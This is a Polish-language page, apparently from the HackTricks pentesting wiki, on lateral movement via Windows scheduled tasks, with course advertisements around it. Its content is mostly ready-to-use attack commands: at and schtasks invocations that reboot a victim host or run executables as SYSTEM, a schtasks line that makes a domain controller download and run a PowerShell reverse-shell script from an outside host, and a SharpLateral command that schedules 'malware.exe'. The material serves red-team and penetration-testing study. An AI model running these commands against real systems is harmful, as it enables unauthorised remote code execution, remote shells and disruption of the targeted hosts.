AtExec / SchtasksExec

Naucz się hakowania AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Jak to działa

At pozwala zaplanować zadania na hostach, gdzie znasz nazwę użytkownika/(hasło/Hash). Możesz go więc użyć do wykonywania poleceń na innych hostach i uzyskiwania wyników.

At \\victim 11:00:00PM shutdown -r

Za pomocą schtasks najpierw musisz utworzyć zadanie, a następnie je wywołać:

schtasks /create /n <TASK_NAME> /tr C:\path\executable.exe /sc once /st 00:00 /S <VICTIM> /RU System
schtasks /run /tn <TASK_NAME> /S <VICTIM>
schtasks /create /S dcorp-dc.domain.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "MyNewtask" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/InvokePowerShellTcp.ps1''')'"
schtasks /run /tn "MyNewtask" /S dcorp-dc.domain.local

Możesz również użyć SharpLateral:

SharpLateral schedule HOSTNAME C:\Users\Administrator\Desktop\malware.exe TaskName

Więcej informacji na temat użycia schtasks z biletami srebrnymi tutaj.

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Last updated